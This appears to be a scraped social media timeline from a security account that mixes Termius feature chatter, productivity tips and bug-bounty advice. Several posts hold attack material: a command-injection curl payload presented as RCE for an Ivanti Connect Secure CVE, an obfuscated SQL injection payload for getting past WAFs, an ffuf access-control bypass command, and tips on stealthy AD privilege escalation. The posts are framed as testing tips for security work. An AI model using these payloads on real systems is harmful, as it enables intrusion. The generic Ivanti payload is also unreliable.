IOCsec

@RKudiyarov @TermiusHQ Looking forward to being able to save Workspaces created with Local Terminals and reuse them. It would make my work much easier. 📍One more aspect: in a Workspace the possibility to drag & drop terminals (up-down) would be super useful, to be able to change Terminal order.

@IOCsec @TermiusHQ We tested this feature and realized that it must save the current directory of a local terminal. We decided to remove the support of the local terminal for this release.

Big news: Early next year, Termius will let you easily create, save, and reopen Workspaces. It’s going to completely change how you handle multiple connections. But first, let’s talk about how we got here... 🧵

@NahamSec If rpcbind or rpc.statd is active, expect a flood of low-quality crawlers targeting your system, especially after any new or updated post. Use robots.txt to disallow their access, but for better protection, rely on a WAF or firewall to block them based on User-Agent or IP.

I’m not sure whose crawler it is but they keep hitting one of my IP addresses and they keep getting their box exploited. 🤷🏽‍♂️

Discover Hidden Vulnerabilities #Fuzz smarter, not harder! Use #ffuf to uncover Broken Access Control (BAC) like a pro: 👉 ffuf -w /path/to/wordlist.txt -u target.com/FUZZ -H "X-Original-URL: /admin" Unlock doors security teams forgot to lock! #BugBounty #ffuf #BAC

Receive “test” in the response? The target is likely vulnerable. 🧵2/2 👉 Payload for #RCE in #IvantiConnect Secure: curl -X POST http://target/vulnerable_endpoint -d "input=; whoami > /tmp/rce_test" Crafted #payloads are the ultimate #hacking approach!

CVE-2025-0282: #RCE in Ivanti Connect Secure 🧵 1/1 #Ivanti Connect Secure (<22.7R2.5) allows unauthenticated remote code execution (RCE). 👉 Test if target is vulnerable: curl -X POST http://target/vulnerable_endpoint -d "input=echo test" 👇How to test and #payload

@TermiusHQ #Termius' new Workspace feature is awesome. How can I save a #Workspace for reuse? Consider adding options to drag & drop a terminal from a Workspace (up & down) and add a search at the top of Workspace to quickly find a (renamed) terminal from that workspace. @ update Docs.

Because these are big code changes, we’re releasing them in stages. The next Termius update will include the Workspace feature - just drag multiple connections in one tab and switch between the Focus Mode to Split View modes!

@hackinarticles Let’s not forget about targeting shadow admin accounts. #Exploiting AddSelf on less monitored, high-privilege groups can often #bypass traditional detection mechanisms, opening doors for stealthier privilege escalation paths.

Abusing AD-DACL: AddSelf hackingarticles.in/abusing-ad-dac… #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #informationsecurity #CyberSec #networking #offensivesecurity #infosecurity #cyberattacks #security #oscp #cybersecurityawareness #bugbounty #bugbountytips

Obfuscated #polymorphic SQLi payload: ?id=1' /*!AND*/ (/*!SELECT*/ 1 /*!FROM*/ (/*!SELECT*/ COUNT(*),CONCAT((/*!SELECT*/ DATABASE()),FLOOR(RAND(0)*2))x /*!FROM*/ INFORMATION_SCHEMA.SCHEMATA /*!GROUP BY*/ x)a)-- -

🎯 Payloads that Break Barriers Think your system is secure against SQLi? Think again. Even “fully patched” defenses can fail with the right payload. 🧵Thread 👉 Challenge your #WAF 👉 Test smart, stay sharp! #Payload #BugBounty #SQLi 👇 See payload

What does a bug hunter say after getting #RCE? 🔓 “Space, the final frontier… and now, it’s 2 A.M!” 🚀 #CyberSecurity #CyberJoke #BugBounty

🎯 Targeted Scans for Precision Results Why scan an entire domain when a targeted scan saves time & effort? Focus on specific endpoints like /api/v1/login or /admin. Misconfigurations often hide here, waiting to be exploited. #BugBounty #Pentesting #ScanSmarter

Master Recon with Smart Tactics 💡 Most miss this step: Leverage public code repositories! 🧐 Search for keys, tokens, and sensitive files in GitHub or GitLab tied to your target. 💬 This simple step has led to high-impact findings in #BugBounty programs. #Recon #Pentesting

“Are you testing or guessing? 🤔 Without a structured workflow, you’re leaving #AttackSurface gaps untested. In Penetration Testing & #BugBounty, luck isn’t a strategy—planning is. ➡️ How do you map your attack surface? Share your approach! #Workflow #AttackSurface #BugBounty”

4. Delegate • If a task cannot be automated, but can be done more efficiently by someone else, delegate it to the right person.

3. Automate • Once you’ve eliminated and simplified, automate the processes that are worth automating. However, automating an unnecessary task is just a waste of time and resources.

4 Steps to #Success in 2025 If you have the plan, you're already 50% ahead of the rest. Now apply daily: 🧵thread